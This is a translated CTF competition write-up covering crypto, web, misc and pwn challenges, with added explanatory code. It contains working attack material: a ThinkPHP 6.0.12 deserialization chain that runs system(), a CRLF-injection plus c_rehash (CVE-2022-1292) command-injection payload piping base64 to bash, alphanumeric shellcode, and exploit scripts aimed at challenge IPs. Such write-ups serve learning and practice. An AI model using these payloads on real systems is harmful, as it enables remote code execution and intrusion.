Preface
Truly the gaokao of CTF! Every time I play it I end up exhausted! Final result: CTF 88 + theory 1003 -> 156 🤣🤣🤣
Crypto
签到电台 (Sign-in Radio)
The hint "粥市安全到达了" maps to 7 telegraph code groups: 1732 2514 1344 0356 0451 6671 0055. Take the first 7 groups (7*4 digits) of the codebook, 1217 8895 2785 4160 1813 4846 9113, and apply the mod-10 rule from the hint (digit-wise addition, no carry); this gives the encrypted groups 2949 0309 3029 4416 1264 0417 9168. Sending /send?msg=2949030930294416126404179168 returns the flag.
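The "add without carry" rule above is digit-wise addition modulo 10 of 4-digit telegraph code groups against a codebook, which is a one-time pad over decimal digits. The following is an added example (not code from the writeup) that implements both the sender's and the receiver's direction and builds the /send query; the group values are the ones quoted above, and the length check on the pad is my own addition.

```python
# Added example, not from the writeup: digit-wise mod-10 "no carry" addition
# of telegraph code groups against a codebook (a one-time pad over digits).
PLAIN_GROUPS = ["1732", "2514", "1344", "0356", "0451", "6671", "0055"]  # 粥市安全到达了
KEY_GROUPS = ["1217", "8895", "2785", "4160", "1813", "4846", "9113"]    # first 7 codebook groups


def _check(a, b):
    if len(a) != len(b) or not (a.isdigit() and b.isdigit()):
        raise ValueError("groups must be equal-length digit strings: %r %r" % (a, b))


def add_no_carry(a, b):
    """Digit-wise (a + b) mod 10; carries are dropped, so 6+4 -> 0."""
    _check(a, b)
    return "".join(str((int(x) + int(y)) % 10) for x, y in zip(a, b))


def sub_no_carry(a, b):
    """Inverse for the receiver: digit-wise (a - b) mod 10."""
    _check(a, b)
    return "".join(str((int(x) - int(y)) % 10) for x, y in zip(a, b))


def encrypt(plain_groups, key_groups):
    """One codebook group per plaintext group; refuse to run out of pad."""
    if len(key_groups) < len(plain_groups):
        raise ValueError("codebook exhausted")
    return [add_no_carry(p, k) for p, k in zip(plain_groups, key_groups)]


def decrypt(cipher_groups, key_groups):
    if len(key_groups) < len(cipher_groups):
        raise ValueError("codebook exhausted")
    return [sub_no_carry(c, k) for c, k in zip(cipher_groups, key_groups)]


def send_path(cipher_groups):
    """The /send?msg= query the challenge accepts (groups concatenated)."""
    return "/send?msg=" + "".join(cipher_groups)


if __name__ == "__main__":
    ct = encrypt(PLAIN_GROUPS, KEY_GROUPS)
    print(" ".join(ct))
    print(send_path(ct))
```

Because carries are discarded, each ciphertext digit depends on exactly one key digit, so decryption is the same loop with subtraction; reusing codebook groups across messages would leak digit differences, which is why the pad position matters.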
基于挑战码的双向认证 1, 2 (challenge-code-based mutual authentication)
Unintended solution: a plain grep yields the flags of both challenges.
基于挑战码的双向认证 3
Still unintended: weak password root/toor for privilege escalation, flag in the usual place.
PS: what puzzles me is what that grep'd flag actually is?
(It made me think the challenge had been patched, until I saw a pile of solves and wondered whether it was still the unintended route 😒
ISO9798
from pwn import *
from hashlib import sha256
import itertools
import string

context.log_level = 'debug'
p = remote("47.93.176.13", 32892)

# Proof of work: the server gives a 16-char suffix and a target digest;
# brute-force the 4-char alphanumeric prefix XXXX.
p.recvuntil('sha256(XXXX+')
end = p.recv(16).decode()
p.recvuntil(') == ')
sha = p.recvuntil('\n')[:-1].decode()

def proof_of_work(end, sha):
    alp = string.ascii_letters + string.digits
    for cand in itertools.product(alp, repeat=4):
        prefix = ''.join(cand)
        if sha256((prefix + end).encode()).hexdigest() == sha:
            return prefix

xxxx = proof_of_work(end, sha)
p.recvuntil('Give me XXXX: ')
p.sendline(xxxx)

# Option 0: the server hands us Encrypt(rA||rB||B, k) as hex.
p.recvuntil('> ')
p.sendline('0')
p.recvuntil('Encrypt(rA||rB||B, k) (in hex) is ')
hhh = p.recvuntil('\n')[:-1].decode()
print(hhh)

# Reflection: swap the two leading 16-byte blocks (32 hex chars each) and
# send the server's own ciphertext back as our response.
s1 = hhh[:32]
s2 = hhh[32:64]
p.recvuntil('> ')
p.sendline(s2 + s1)
p.recvall()
Web
Ezpop
Reference: https://m.freebuf.com/vuls/321546.html
ThinkPHP 6.0.12LTS deserialization vulnerability. The source is leaked, and the entry route is ?s=index/test
POC:
<?php
namespace think{
    abstract class Model{
        private $lazySave = false;
        private $data = [];
        private $exists = false;
        protected $table;
        private $withAttr = [];
        protected $json = [];
        protected $jsonAssoc = false;
        function __construct($obj = ''){
            // lazySave = true makes __destruct() call save()
            $this->lazySave = True;
            // the value that ends up as the argument of system()
            $this->data = ['whoami' => ['cat /flag.txt']];
            // exists = true routes save() into updateData() -> checkAllowFields() -> db()
            $this->exists = True;
            // a nested Model here gets concatenated to a string inside db(),
            // which triggers __toString() -> toJson() -> toArray() on it
            $this->table = $obj;
            // toArray() applies the withAttr callbacks to json fields: system('cat /flag.txt')
            $this->withAttr = ['whoami' => ['system']];
            $this->json = ['whoami',['whoami']];
            $this->jsonAssoc = True;
        }
    }
}
namespace think\model{
    use think\Model;
    class Pivot extends Model{
    }
}
namespace{
    // the outer Pivot carries the chain, the inner one is the $table that gets stringified
    echo(urlencode(serialize(new think\model\Pivot(new think\model\Pivot()))));
}
online_crt
First, the source is leaked; from it, this handler forwards requests to the Go service:
@app.route('/proxy', methods=['GET'])
def proxy():
    uri = request.form.get("uri", "/")
    client = socket.socket()
    client.connect(('localhost', 8887))
    msg = f'''GET {uri} HTTP/1.1
Host: test_api_host
User-Agent: Guest
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
'''
    client.send(msg.encode())
    data = client.recv(2048)
    client.close()
    return data.decode()

app.run(host="0.0.0.0", port=8888)
On the Go side the crux is how to forge the Host: the rename is only reachable when Host is admin and URL.RawPath is non-empty (Go populates RawPath only when the request path uses non-canonical escapes, which is why the exp requests renam%65 rather than rename). Once both conditions hold, we can rename files freely:
if c.Request.URL.RawPath != "" && c.Request.Host == "admin" {
    err := os.Rename(staticPath+oldname, staticPath+newname)
    if err != nil {
        return
    }
    c.String(200, newname)
    return
}
c.String(200, "no")
Looking at the proxy code again: uri is copied verbatim into a hand-built HTTP request, so CRLFs inside it terminate the request line early and let us supply our own headers (including Host); the proxy's own header lines then trail behind our blank line as a second, harmless request.
After the rename, going back to the createlink route shows that it executes c_rehash, which is affected by CVE-2022-1292:
c_rehash static/crt/ && ls static/crt/
There is no public exploit online, so the removed code can be located from the fix commit published by the project:
@@ -161,10 +178,12 @@ sub check_file {
sub link_hash_cert { sub link_hash_cert {
my $fname = $_[0]; my $fname = $_[0];
$fname =~ s/\"/\\\"/g; my ($hash, $fprint) = compute_hash($openssl, "x509", $x509hash,
my ($hash, $fprint) = `"$openssl" x509 $x509hash -fingerprint -noout -in "$fname"`; "-fingerprint", "-noout",
"-in", $fname);
chomp $hash; chomp $hash;
chomp $fprint; chomp $fprint;
return if !$hash;
$fprint =~ s/^.*=//; $fprint =~ s/^.*=//;
$fprint =~ tr/://d; $fprint =~ tr/://d;
my $suffix = 0; my $suffix = 0;
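Review bot: the pre-change line in this hunk only escapes double quotes in $fname (`$fname =~ s/\"/\\\"/g;`) and then interpolates it into a backtick command, so the filename still passes through a shell where `||`, `|`, `&&`, `;` and `$(...)` are interpreted; a single closing `"` is enough to break out of `-in "$fname"`. The replacement passes $fname as a separate argument to compute_hash instead of building a command string, and the added `return if !$hash;` stops the function when openssl produced no hash rather than continuing with empty values.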
@@ -202,10 +221,12 @@ sub link_hash_cert {
sub link_hash_crl { sub link_hash_crl {
my $fname = $_[0]; my $fname = $_[0];
$fname =~ s/'/'\\''/g; my ($hash, $fprint) = compute_hash($openssl, "crl", $crlhash,
my ($hash, $fprint) = `"$openssl" crl $crlhash -fingerprint -noout -in '$fname'`; "-fingerprint", "-noout",
"-in", $fname);
chomp $hash;
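Review bot: same change as in link_hash_cert, applied to the CRL path. Here the old code single-quoted $fname and escaped embedded single quotes (`$fname =~ s/'/'\\''/g;`), which is tighter quoting than the double quotes used for certificates, but the command still ran through a shell; moving to compute_hash removes the shell from both paths. The hunk as reproduced here ends at `chomp $hash;`, so the rest of the function is not shown.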
The fix removes exactly this part, so that is where the problem lies.
Auditing the script: when c_rehash is run on a directory it computes a hash for every file whose name looks like a certificate or CRL (crt/pem and so on), using this command:
`"$openssl" x509 $x509hash -fingerprint -noout -in "$fname"`;
It is a backtick shell command, so with $fname under our control, closing the double quote gives arbitrary command execution.
For this challenge that means using the Go rename to set the filename to something like: 1.crt"||cat /flag >flag.txt " (the exp below base64-encodes the command so that the name contains no '/', which os.Rename would treat as a path separator, and no spaces).
exp:
uri=/admin/renam%25%36%35?oldname=[getcrt得到的文件名].crt%26newname=1.crt%2522%257C%257Cecho%2520Y2F0IC9mbGFnID5mbGFnLnR4dA%253D%253D%257Cbase64%2520-d%257Cbash%2526%2526echo%2522%20HTTP/1.1%0d%0aHost:%20admin%0d%0aConnection:close%0d%0a%0d%0a
Then visit the /createlink route, and static/crt/flag.txt holds the flag.
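The exp above stacks three encoding layers (form-urlencoding for the proxy, percent-encoding for the Go query parser, and shell quoting inside c_rehash), which is easy to get wrong by hand. The block below is an added example, not code from the writeup or the challenge: it builds the uri value for a given oldname and command, reproduces the proxy's hand-built request to show the injected Host header, parses the result the way a server would, and renders the c_rehash command the filename ends up in. The /admin/rename route name, the oldname value, and the openssl/-subject_hash placeholders are assumptions.

```python
import base64
from urllib.parse import quote, unquote, parse_qs

# Assumption: the Go rename handler is /admin/rename. "%65" is a non-canonical
# escape of "e"; Go only sets URL.RawPath when the raw path differs from the
# canonical encoding, so this satisfies the RawPath != "" check.
RENAME_PATH = "/admin/renam%65"


def needs_rawpath(path):
    """Approximation of Go's rule: RawPath is populated only when re-encoding
    the decoded path does not reproduce the original string."""
    return quote(unquote(path), safe="/") != path


def injected_newname(cmd):
    """Filename that closes the double quotes around -in "$fname" in c_rehash
    and appends a pipeline. The command is base64-wrapped so the name has
    no '/' (os.Rename would treat it as a path separator) and no spaces."""
    b64 = base64.b64encode(cmd.encode()).decode()
    return '1.crt"||echo %s|base64 -d|bash&&echo"' % b64


def build_uri(oldname, newname, host="admin"):
    """Value of the uri field *after* Flask form-decodes it: the query is
    percent-encoded once (Go decodes it), then CRLFs end the request line and
    inject our own Host header; the proxy's own headers end up after our
    terminating blank line and are ignored."""
    query = "oldname=%s&newname=%s" % (quote(oldname, safe=""), quote(newname, safe=""))
    return "%s?%s HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n" % (RENAME_PATH, query, host)


def form_encode(uri):
    """What goes on the wire as uri=... (one more encoding layer)."""
    return quote(uri, safe="")


def form_decode(value):
    return unquote(value)


def render_proxy_request(uri):
    """Reproduces the proxy's hand-built request from the challenge source."""
    return ("GET %s HTTP/1.1\nHost: test_api_host\nUser-Agent: Guest\n"
            "Accept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\n"
            "Connection: close\n") % uri


def parse_first_request(raw):
    """Parse like a server: the first request's headers end at the first CRLFCRLF."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    return {"method": method, "path": path, "version": version,
            "query": {k: v[0] for k, v in parse_qs(query).items()},
            "headers": headers}


def c_rehash_command(fname, openssl="openssl", x509hash="-subject_hash"):
    """The backtick command from the vulnerable c_rehash, with placeholder
    values (assumption) for $openssl and $x509hash."""
    return '"%s" x509 %s -fingerprint -noout -in "%s"' % (openssl, x509hash, fname)


if __name__ == "__main__":
    newname = injected_newname("cat /flag >flag.txt")
    uri = build_uri("0123456789.crt", newname)   # constructed oldname
    print("uri=" + form_encode(uri))
    req = parse_first_request(render_proxy_request(uri))
    print(req["path"], req["headers"]["host"], req["query"]["newname"])
    print(c_rehash_command(req["query"]["newname"]))
```

parse_first_request deliberately stops at the first CRLFCRLF: everything the proxy appends after that (its own Host: test_api_host line) never reaches the Go handler's view of the request, which is the whole point of the injection.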
Misc
ez_usb
There are two keyboard devices; extracting the keystrokes of each separately yields an archive and the archive's password, which gives the flag.
[-] Unknow Key : 04
[-] Unknow Key : 04
[-] Unknow Key : 01
[-] Unknow Key : 01
[+] Found : 526172211a0700<CAP>c<CAP>f907300000d00000000000000c4527424943500300000002<CAP>a000000<CAP>02b9f9b0530778b5541d33080020000000666c61672<CAP>e<CAP>747874<CAP>b9b<CAP>a013242f3a<CAP>fc<CAP>000b092c229d6e994167c05<CAP>a7<CAP>8708b271f<CAP>fc<CAP>042ae3d251e65536<CAP>f9a<CAP>da87c77406b67d0<CAP>e6316684766<CAP>a86e844d<CAP>c81aa2<CAP>c72c71348d10c4<CAP>c<DEL>3d7b<CAP>00400700
Running as user "root" and group "root". This could be dangerous.
[+] Found : 35c535765e50074a
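The keystroke dumps above come from decoding USB HID keyboard reports (8 bytes per packet: modifier byte, reserved byte, then up to six key codes), with Caps Lock and Backspace shown as <CAP> and <DEL>. The following is an added example, not the script used in the writeup: it parses usb.capdata lines as tshark prints them, reconstructs the typed text while applying Shift, Caps Lock and Backspace, and checks for the RAR signature (526172211a0700, "Rar!\x1a\x07\x00") that the first keyboard's output begins with. The sample reports are constructed, not taken from the challenge capture.

```python
# Added example, not from the writeup: decode USB HID boot-keyboard reports.
KEYMAP = {0x04 + i: chr(ord("a") + i) for i in range(26)}          # a..z
KEYMAP.update({0x1e + i: "1234567890"[i] for i in range(10)})       # 1..9, 0
KEYMAP.update({0x2c: " ", 0x2d: "-", 0x2e: "=", 0x2f: "[", 0x30: "]", 0x31: "\\",
               0x33: ";", 0x34: "'", 0x35: "`", 0x36: ",", 0x37: ".", 0x38: "/"})
SHIFTED = dict(zip("1234567890-=[]\\;'`,./", "!@#$%^&*()_+{}|:\"~<>?"))
SHIFT_MASK = 0x22                      # left (0x02) or right (0x20) shift in byte 0
KEY_ENTER, KEY_BACKSPACE, KEY_CAPSLOCK = 0x28, 0x2a, 0x39


def parse_capdata(lines):
    """Turn tshark usb.capdata lines (with or without colons) into 8-byte reports."""
    reports = []
    for line in lines:
        raw = bytes.fromhex(line.strip().replace(":", ""))
        if len(raw) == 8:              # ignore non-keyboard report sizes
            reports.append(raw)
    return reports


def decode_hid_reports(reports):
    """Reconstruct the typed text. Byte 0 = modifiers, byte 2 = first key code;
    a key code of 0 is a release report, Caps Lock toggles, Backspace deletes."""
    out, caps = [], False
    for rep in reports:
        mods, key = rep[0], rep[2]
        if key == 0:
            continue
        if key == KEY_CAPSLOCK:
            caps = not caps
        elif key == KEY_BACKSPACE:
            if out:
                out.pop()
        elif key == KEY_ENTER:
            out.append("\n")
        elif key in KEYMAP:
            ch = KEYMAP[key]
            if mods & SHIFT_MASK:
                ch = SHIFTED.get(ch, ch.upper())
            elif caps and ch.isalpha():
                ch = ch.upper()
            out.append(ch)
        else:
            out.append("<%02x>" % key)  # unknown usage: keep a marker, as the tool does
    return "".join(out)


def looks_like_rar(hexstr):
    """True when the recovered hex starts with the RAR 4.x signature."""
    return bytes.fromhex(hexstr[:14]) == b"Rar!\x1a\x07\x00"


SAMPLE_CAPDATA = [   # constructed: 5, 2, CapsLock, c, CapsLock, x, Backspace, Shift+1
    "00:00:22:00:00:00:00:00", "00:00:00:00:00:00:00:00",
    "00:00:1f:00:00:00:00:00", "00:00:00:00:00:00:00:00",
    "00:00:39:00:00:00:00:00", "00:00:00:00:00:00:00:00",
    "00:00:06:00:00:00:00:00", "00:00:00:00:00:00:00:00",
    "00:00:39:00:00:00:00:00", "00:00:00:00:00:00:00:00",
    "00:00:1b:00:00:00:00:00", "00:00:00:00:00:00:00:00",
    "00:00:2a:00:00:00:00:00", "00:00:00:00:00:00:00:00",
    "02:00:1e:00:00:00:00:00", "00:00:00:00:00:00:00:00",
]

if __name__ == "__main__":
    print(decode_hid_reports(parse_capdata(SAMPLE_CAPDATA)))
```

Run tshark with a filter on the device address of each keyboard (e.g. usb.src) and -T fields -e usb.capdata, feed each device's lines separately, and the hex from the first keyboard passes looks_like_rar while the second gives the password.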
everlasting_night
First, LSB analysis: the Alpha 2 plane shows something standing upright.
So, using clockpixel, an encrypted archive is extracted.
The archive password is the string appended at the very end of the image, cracked as an MD5 hash.
That yields one more image; opening it in GIMP and adjusting the width reveals the flag.
问卷调查 (Survey)
Fill in the survey to get the flag.
babydisk
First, 取证大师 (Forensics Master) auto-extraction pulled out an encrypted file and an audio file.
Then, with Kali's bundled deepsound2john.py and brute-forcing the resulting hash, the password came out as: feedback
Opening the wav in DeepSound gives key.txt.
With that, mount the encrypted file in VeraCrypt to get an archive, which turns out to be corrupted.
The archive's name hints at a spiral; Mumuzi's exp, copied directly:
def function(n):
    # Fill an n x n matrix with 1..n*n in clockwise spiral order
    matrix = [[0] * n for _ in range(n)]
    number = 1
    left, right, up, down = 0, n - 1, 0, n - 1
    while left < right and up < down:
        # left to right along the top edge
        for i in range(left, right):
            matrix[up][i] = number
            number += 1
        # top to bottom along the right edge
        for i in range(up, down):
            matrix[i][right] = number
            number += 1
        # right to left along the bottom edge
        for i in range(right, left, -1):
            matrix[down][i] = number
            number += 1
        # bottom to top along the left edge
        for i in range(down, up, -1):
            matrix[i][left] = number
            number += 1
        left += 1
        right -= 1
        up += 1
        down -= 1
    # for odd n the centre cell is left over and filled separately
    if n % 2 != 0:
        matrix[n // 2][n // 2] = number
    return matrix

f = open('spiral.zip', 'rb').read()
s = function(87)          # 87 * 87 = 7569 bytes
s = sum(s, [])            # flatten row by row
arr = [0] * 7569
# byte i of the unscrambled file is the byte that was written at spiral position s[i]
for i in range(len(s)):
    arr[i] = f[s[i] - 1]
with open('fla.zip', 'wb') as f1:
    f1.write(bytes(arr))
for i in arr:
    print(hex(i)[2:].zfill(2), end='')
This yields the following image.
Following the spiral once more gives the flag: flag{701fa9fe-63f5-410b-93d4-119f96965be6}
Pwn
login-nomal
First select 1 via opt and use msg to set the pointer to 1; case 2 holds the vulnerability, so select case 2 via opt 2 and write the shellcode through msg.
from pwn import *

context(arch='amd64', os='linux', log_level='debug')
elf = ELF('./login')
DEBUG = 0
if DEBUG:
    libc = ELF("/home/shoucheng/glibc-all-in-one/libs/2.33-0ubuntu5_amd64/libc-2.33.so")
    ld = ELF("/home/shoucheng/glibc-all-in-one/libs/2.33-0ubuntu5_amd64/ld-2.33.so")
    p = process(argv=[ld.path, elf.path], env={"LD_PRELOAD": libc.path})
    # p = process('./login')
else:
    ip = '47.93.176.91'
    port = 35204
    # libc = ELF("./libc.so.6")
    p = remote(ip, port)

def debug():
    gdb.attach(p, "b main")
    # gdb.attach(p, "b *$rebase(0x)")

# opt 1 with msg "ro0ta": sets the pointer to 1
p.recvuntil(">>> ")
p.send("opt:1\nmsg:ro0ta\n\r\r\n")
p.recvuntil(">>> ")
# debug()
# opt 2 is the vulnerable case; msg carries alphanumeric x86-64 shellcode
p.send(
    "opt:2\nmsg:Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070ta\n\r\r\n")
p.interactive()
yyds|´・ω・)ノ
By 1 at May 30th, 2022 at 10:46 am.